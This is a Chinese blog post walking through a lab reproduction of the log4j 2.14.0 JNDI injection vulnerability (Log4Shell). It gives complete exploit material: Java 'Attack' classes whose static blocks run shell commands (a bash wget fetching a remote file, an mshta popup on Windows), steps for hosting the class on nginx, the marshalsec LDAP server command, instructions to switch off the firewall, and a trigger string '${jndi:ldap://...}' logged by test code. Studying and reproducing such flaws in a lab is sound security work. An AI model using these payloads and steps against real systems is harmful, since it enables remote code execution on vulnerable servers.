• log4j2.14.0漏洞攻击复现


    log4j-2.14.0漏洞攻击复现

    ​ 刚知道log4j漏洞的时候,我就在自己负责的项目里简单测试了一下,没有测试出来也就没有再关注这个了。接下来几天的时间无论是朋友圈、聊天群、技术论坛都是在讨论这个话题的,成功引起了我的好奇,我就想复现一下这个漏洞。刚开始复现的时候为图省事我就创建了一个springboot项目,在springboot项目里无论我怎么测试都复现不了这个,然后我有怀疑是因为jdk的版本原因我使用的是jdk11,我更换了很多版本的jdk还是复现不了,直到我看到了一位大佬发布的帖子Spring Boot应对Log4j2注入漏洞官方指南中有这么一段话:

    Spring Boot默认日志组件是logback,开发者通过日志门面Slf4j进行集成对接。Spring Boot 用户只有在将默认日志系统切换到 Log4J2 时才会受到此漏洞的影响。Spring Boot包含的log4j-to-slf4j和log4j-api、spring-boot-starter-logging不能独立利用。只有log4j-core在日志消息中使用和包含用户输入的应用程序容易受到攻击。

    简单一句话在springboot默认配置中是不会触发这个漏洞的,而我为了图省事用的就是默认配置。接下来我创建了一个maven项目成功复现了这个漏洞。我把自己复现的过程记录下来,分享给大家。

    环境准备:

    软件 版本 描述 下载地址
    CentOS 8.3.2011-x86_64-minimal liunx操作系统 链接: https://pan.baidu.com/s/1pG549BKWhbveM_Pvgj595g 提取码: iur3
    Idk 1.8.0_312 Java 链接: https://pan.baidu.com/s/1jWUd1EjQnC5yybLiJlD9OA 提取码: knc7
    marshalsec 0.0.3 java工具将数据转化为代码执行(这里是我编译好的) 链接: https://pan.baidu.com/s/1M-qLRpb8C3DWtVG9BNojdg 提取码: mc7c

    攻击流程:

    1. 编写java攻击代码。
    2. 将编写的攻击代码编译成class文件,然后发布到文件服务器。这里我是用nginx做演示。
    3. marshalsec使用将编写的class用jndi发布出去。
    4. 本地测试触发。

    开始实现:

    第一步:编写攻击代码

    import java.lang.Runtime;
    import java.lang.Process;
    
    /**
     * @author fuping
     */
    public class Attack {
        static {
            try {
                Runtime rt = Runtime.getRuntime();
    			System.out.println("wget 下载图片");
                String[] commands = {"/bin/bash", "-c", "wget https://raw.githubusercontent.com/duzhaosongyue/img/main/1.png"};
                Process pc = rt.exec(commands);
                pc.waitFor();
            } catch (Exception e) {
                e.printStackTrace();
            }
        }
    
    }
    

    liunx版本的攻击代码。

    import java.io.IOException;
    
    /**
     * @author fuping
     */
    public class Attack {
        static {
            try {
                Runtime.getRuntime().exec("cmd /c mshta vbscript:msgbox(\"有人从你的log4j进来了\",64,\"来自熊猫头的消息\")(window.close)");
            } catch (IOException e) {
                e.printStackTrace();
            }
        }
    }
    

    windows版本的攻击代码。

    第二步:发布攻击代码到文件服务器

    1. 在虚拟机centos系统中安装nginx。可以使用一下命令安装:yum -y install nginx

    2. 找到hmtl文件夹。可以使用一下命令搜索:find / -type d -name html

      这里我搜索到路径是 /usr/share/nginx/html。

    3. 上传编译好的class文件到搜索的html文件夹下。

    4. 启动nginx。命令如下:sudo nginx

    5. 使用虚拟主机ip+端口+文件名称尝试下载文件。

      这里我的下载地址为 http://172.16.102.19/Attack.class 。如果出现不能下载的情况请检查防火墙是否打开 命令如下:

      systemctl status firewalld                             #防火墙状态
      systemctl stop firewalld.service                       #关闭防火墙
      firewall systemctl disable firewalld.service           #禁止防火墙开机启动 
      
    6. 测试下载成功第二步完成进行下一步。

    第三步:使用marshalsec发布jndi服务。

    1. 安装jdk1.8.0_312。

      1. 上传jdk-8u221-linux-x64.tar.gz到虚拟机。

      2. 创建/opt/java目录。创建命令:mkdir /opt/java

      3. 解压jdk到/opt/java目录下 。解压命令:tar -zxf jdk-8u221-linux-x64.tar.gz -C /opt/java

      4. 配置环境变量。命令:sudo vim /etc/profile. (如果没有安装vim 可以使用 yum -y install vim进行安装。)在profile文件最底部追加:

        export JAVA_HOME=/opt/java/jdk1.8.0_221
        export JRE_HOME=/opt/java/jdk1.8.0_221/jre 
        export CLASSPATH=.:$JAVA_HOME/lib/dt.jar:$JAVA_HOME/lib/tools.jar:$JRE_HOME/lib:$CLASSPATH export PATH=$PATH:$JAVA_HOME/bin  
        
      5. 重新加载配置。执行命令 :source /etc/profile

      6. 测试jdk是否安装成功。执行命令: java -version

    2. 上传marshalsec到虚拟机。执行一下命令启动jndi服务:

      java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://172.16.102.19/#Attack" 9991

      172.16.102.19 指向文件服务器地址,Attack是编译后java攻击代码的类名称,触发jndi请求后会自动拼接请求 http://172.16.102.19/Attack.class

      上面这个命令不能后台运行,断开链接后也就终止了,后台运行使用:

      java -cp marshalsec.jar marshalsec.jndi.LDAPRefServer "http://172.16.102.19/#Attack" 9991 > log.txt >&1 &

    第四步:本地触发

    1. 创建一个maven项目。

    2. 添加依赖 。

      在pom.xml中添加依赖:

      <dependencies>
          <dependency>
              <groupId>org.apache.logging.log4j</groupId>
              <artifactId>log4j-api</artifactId>
              <version>2.14.0</version>
          </dependency>
          <dependency>
              <groupId>org.apache.logging.log4j</groupId>
              <artifactId>log4j-core</artifactId>
              <version>2.14.0</version>
          </dependency>
      </dependencies>
      
    3. 配置log4j。

      在src/main/resources目录下创建log4j2.xml 内容如下:

      注意window下路径是/,liunx下路径是\ 如果执行出现错误 请检查输出目录的/是否正确。

      <?xml version="1.0" encoding="UTF-8"?>
      
      <!-- status : 指定log4j本身的打印日志的级别.ALL< Trace < DEBUG < INFO < WARN < ERROR
          < FATAL < OFF。 monitorInterval : 用于指定log4j自动重新配置的监测间隔时间,单位是s,最小是5s. -->
      <Configuration status="WARN" monitorInterval="30">
          <Properties>
              <!-- 配置日志文件输出目录 ${sys:user.home} -->
              <Property name="LOG_HOME">logs</Property>
              <property name="ERROR_LOG_FILE_NAME">logs\error</property>
              <property name="WARN_LOG_FILE_NAME">logs\warn</property>
      
              <property name="PATTERN">%d{yyyy-MM-dd HH:mm:ss.SSS} [%t-%L] %-5level %logger{36} - %msg%n</property>
          </Properties>
      
          <Appenders>
              <!--这个输出控制台的配置 -->
              <Console name="Console" target="SYSTEM_OUT">
                  <!-- 控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch) -->
                  <ThresholdFilter level="trace" onMatch="ACCEPT"
                                   onMismatch="DENY" />
                  <!-- 输出日志的格式 -->
                  <!--
                      %d{yyyy-MM-dd HH:mm:ss, SSS} : 日志生产时间
                      %p : 日志输出格式
                      %c : logger的名称
                      %m : 日志内容,即 logger.info("message")
                      %n : 换行符
                      %C : Java类名
                      %L : 日志输出所在行数
                      %M : 日志输出所在方法名
                      hostName : 本地机器名
                      hostAddress : 本地ip地址 -->
                  <PatternLayout
                          pattern="${PATTERN}" />
              </Console>
      
              <!--文件会打印出所有信息,这个log每次运行程序会自动清空,由append属性决定,这个也挺有用的,适合临时测试用 -->
              <!--append为TRUE表示消息增加到指定文件中,false表示消息覆盖指定的文件内容,默认值是true -->
              <File name="log" fileName="logs/test.log" append="false">
                  <PatternLayout
                          pattern="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n"/>
              </File>
              <!-- 这个会打印出所有的info及以下级别的信息,每次大小超过size,
              则这size大小的日志会自动存入按年份-月份建立的文件夹下面并进行压缩,作为存档 -->
              <RollingFile name="RollingFileInfo" fileName="${LOG_HOME}/info.log"
                           filePattern="${LOG_HOME}/$${date:yyyy-MM}/info-%d{yyyy-MM-dd}-%i.log">
                  <!--控制台只输出level及以上级别的信息(onMatch),其他的直接拒绝(onMismatch) -->
                  <ThresholdFilter level="info" onMatch="ACCEPT"
                                   onMismatch="DENY" />
                  <PatternLayout pattern="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n" />
                  <Policies>
                      <!-- 基于时间的滚动策略,interval属性用来指定多久滚动一次,默认是1 hour。 modulate=true用来调整时间:比如现在是早上3am,interval是4,那么第一次滚动是在4am,接着是8am,12am...而不是7am. -->
                      <!-- 关键点在于 filePattern后的日期格式,以及TimeBasedTriggeringPolicy的interval,
                      日期格式精确到哪一位,interval也精确到哪一个单位 -->
                      <!-- log4j2的按天分日志文件 : info-%d{yyyy-MM-dd}-%i.log-->
                      <TimeBasedTriggeringPolicy interval="1" modulate="true" />
                      <!-- SizeBasedTriggeringPolicy:Policies子节点, 基于指定文件大小的滚动策略,size属性用来定义每个日志文件的大小. -->
                      <!-- <SizeBasedTriggeringPolicy size="2 kB" />  -->
                  </Policies>
              </RollingFile>
      
              <RollingFile name="RollingFileWarn" fileName="${WARN_LOG_FILE_NAME}/warn.log"
                           filePattern="${WARN_LOG_FILE_NAME}/$${date:yyyy-MM}/warn-%d{yyyy-MM-dd}-%i.log">
                  <ThresholdFilter level="warn" onMatch="ACCEPT"
                                   onMismatch="DENY" />
                  <PatternLayout pattern="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n" />
                  <Policies>
                      <TimeBasedTriggeringPolicy />
                      <SizeBasedTriggeringPolicy size="2 kB" />
                  </Policies>
                  <!-- DefaultRolloverStrategy属性如不设置,则默认为最多同一文件夹下7个文件,这里设置了20 -->
                  <DefaultRolloverStrategy max="20" />
              </RollingFile>
      
              <RollingFile name="RollingFileError" fileName="${ERROR_LOG_FILE_NAME}/error.log"
                           filePattern="${ERROR_LOG_FILE_NAME}/$${date:yyyy-MM}/error-%d{yyyy-MM-dd-HH-mm}-%i.log">
                  <ThresholdFilter level="error" onMatch="ACCEPT"
                                   onMismatch="DENY" />
                  <PatternLayout pattern="%d{yyyy-MM-dd HH:mm:ss.SSS} [%t] %-5level %logger{36} - %msg%n" />
                  <Policies>
                      <!-- log4j2的按分钟 分日志文件 : warn-%d{yyyy-MM-dd-HH-mm}-%i.log-->
                      <TimeBasedTriggeringPolicy interval="1" modulate="true" />
                      <!-- <SizeBasedTriggeringPolicy size="10 MB" /> -->
                  </Policies>
              </RollingFile>
      
          </Appenders>
      
          <!--然后定义logger,只有定义了logger并引入的appender,appender才会生效-->
          <Loggers>
              <!--过滤掉spring和mybatis的一些无用的DEBUG信息-->
              <logger name="org.springframework" level="INFO"></logger>
              <logger name="org.mybatis" level="INFO"></logger>
      
              <!-- 第三方日志系统 -->
              <logger name="org.springframework.core" level="info" />
              <logger name="org.springframework.beans" level="info" />
              <logger name="org.springframework.context" level="info" />
              <logger name="org.springframework.web" level="info" />
              <logger name="org.jboss.netty" level="warn" />
              <logger name="org.apache.http" level="warn" />
      
      
              <!-- 配置日志的根节点 -->
              <root level="all">
                  <appender-ref ref="Console"/>
                  <appender-ref ref="RollingFileInfo"/>
                  <appender-ref ref="RollingFileWarn"/>
                  <appender-ref ref="RollingFileError"/>
              </root>
      
          </Loggers>
      
      </Configuration>
      
    4. 编写测试代码。

      package com;
      import org.apache.logging.log4j.LogManager;
      import org.apache.logging.log4j.Logger;
      
      /**
       * @author fuping
       */
      public class Log4jTest {
          
          private static final Logger LOGGER = LogManager.getLogger(Log4jTest.class);
      
          public static void main(String[] args) {
              System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase", "true");
              LOGGER.info("{}", "${jndi:ldap://172.16.102.19:9991/Attack}");
          }
      }
      

    maven项目测试项目的源码可以在github下载

  • 相关阅读:
    1. Java 基础概念
    IDEA 插件
    IDEA 初始化配置
    二叉查找树
    阿里云安装Redis教程与相关问题
    H2知识小结
    重装VisualSVN Server报错
    linux(centos6.10)下去掉mysql的强密码验证
    TP-LINK路由器端口映射全套教程(亲测有效)
    idea2018.3.6,离线使用maven的方法
  • 原文地址:https://www.cnblogs.com/jishuzhaichen/p/15752792.html
Copyright © 2020-2023  润新知